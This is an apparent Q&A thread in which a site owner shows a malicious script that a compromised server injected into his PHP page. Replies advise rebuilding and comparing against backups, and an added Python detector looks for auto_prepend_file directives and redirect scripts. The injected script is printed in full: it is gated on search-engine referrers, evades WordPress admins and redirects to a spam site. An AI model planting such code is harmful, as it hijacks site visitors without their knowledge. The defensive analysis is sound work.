
I am running Apache/2.4.29 with PHP 7.2.24. I have the following simple PHP document:

```html
<html>
<head>
<title>Waste-A-GUID</title>
</head>
<body>
<center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
<!-- short open tag: only parsed when short_open_tag=On -->
<? passthru("uuidgen")?>
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
```

However, when I fetch it with curl using the following command: curl wasteaguid.info

I get the following output:

```html
<html>
</head>
<title>Waste-A-GUID</title>
</head>
<body>
<script>((event) => {  var ref = document.referrer || '';  if (ref.length === 0) {    return;  }  ref = ref.toLowerCase();  if (ref.indexOf('google') === -1      && ref.indexOf('bing') === -1) {    return;  }  var cookie = document.cookie || '';  if (cookie.indexOf('wordpress_logged') !== -1      || cookie.indexOf('wp-settings') !== -1      || cookie.indexOf('wordpress_test') !== -1) {    return;  }  if (cookie.indexOf('wordpress-test') !== -1) {    return;  }  function generateRandomInteger(min, max) {    return Math.floor(min + Math.random()*(max - min + 1));  }  document.cookie = "wordpress-test=1; max-age=86400; path=/;";    const delay = generateRandomInteger(20000, 60000);  setTimeout(() => {    window.location.replace('http://cabonusoffer.com/track/');  }, delay);})();</script><center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
19489a02-7bd3-43e5-930d-04230b8624b0
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
```

It doesn't happen all the time. How did that extra script get in there? Obviously my site has been compromised and I should get a new server and rebuild it. However, I need to copy the HTML/PHP documents and server config to the new server. I don't want to copy the exploit over as well. Where could it be, so that I don't copy it over? What can pre-process PHP files when they are being run?

FigBug

  • Does this answer your question? [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – Greg Askew Aug 07 '22 at 16:08
  • Question is off-topic. Check the link, reinstall the server and verify the situation with a professional, IMHO. – djdomi Aug 07 '22 at 17:33

1 Answer

If you have older copies of the site, you could run comparisons to see what changed. Risk of corruption of code is a major reason for always keeping your central code + content in a secure place.

HTML, JavaScript, CSS and PHP may have unwanted modifications. Image and font files may hide viruses. Database downloads (as from WordPress etc.) may contain malicious additions. Site maintenance scripts might be hacked.

jmullee
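An added Python example (not the answerer's code) that covers both the answer's advice of comparing against an older copy and the question's last point: PHP's `auto_prepend_file` / `auto_append_file` directives wrap every script with another file and can be set in php.ini, in a `.user.ini` dropped into the web root, or in `.htaccess` via `php_value` under mod_php. The `.htaccess` text, HTML and file maps below are constructed samples; `hash_tree()` is the only function that reads the disk.

```python
import hashlib
import os
import re

# PHP directives that run an extra file before/after every script. They can be set
# in php.ini, in a .user.ini dropped into the web root, or in .htaccess via php_value.
PREPEND_RE = re.compile(
    r"^[ \t]*(?:php_(?:admin_)?value[ \t]+)?(auto_(?:prepend|append)_file)[ \t]*=?[ \t]*([^\s=;]+)",
    re.IGNORECASE | re.MULTILINE)
# Inline <script> without src whose body gates on document.referrer, touches cookies
# and redirects: the shape of the block in the question's curl output.
SCRIPT_RE = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.S | re.I)
MARKERS = ("document.referrer", "document.cookie", "location.replace")

# Constructed samples, not taken from the question's server.
SAMPLE_HTACCESS = ("RewriteEngine On\n# php_value auto_prepend_file old.php\n"
                   "php_value auto_prepend_file /tmp/.cache.php\n")
SAMPLE_HTML = ('<body><script>(()=>{var ref=document.referrer;if(!ref)return;'
               'document.cookie="wordpress-test=1";setTimeout(()=>window.location.'
               'replace("http://example.invalid/"),1000);})();</script>'
               '<script src="ga.js"></script></body>')
BACKUP = {"index.php": b"<?php echo 1;", "style.css": b"body{}"}
LIVE = {"index.php": b"<?php eval(1);", "style.css": b"body{}", ".user.ini": b"x"}

def find_prepend_directives(text):
    """Return (directive, target) pairs from php.ini, .user.ini or .htaccess text."""
    return [(m.group(1).lower(), m.group(2).strip("\"'")) for m in PREPEND_RE.finditer(text)]

def find_redirect_scripts(html):
    """Return inline script bodies carrying every referrer-gated redirect marker."""
    return [b for b in SCRIPT_RE.findall(html) if all(mk in b for mk in MARKERS)]

def hash_tree(root):
    """Map each file under root (relative path) to the SHA-256 of its contents."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def diff_trees(backup, live):
    """Compare two {path: content-or-hash} maps, e.g. hash_tree() of a backup and of the
    live web root. A new .user.ini or dropped file appears in 'added', tampering in 'changed'."""
    changed = sorted(p for p in backup if p in live and backup[p] != live[p])
    added = sorted(p for p in live if p not in backup)
    removed = sorted(p for p in backup if p not in live)
    return changed, added, removed
```

Run `diff_trees(hash_tree("/path/to/backup"), hash_tree("/var/www/html"))` against a copy taken before the incident, and feed every `.htaccess`, `.user.ini` and php.ini it reports into `find_prepend_directives()`.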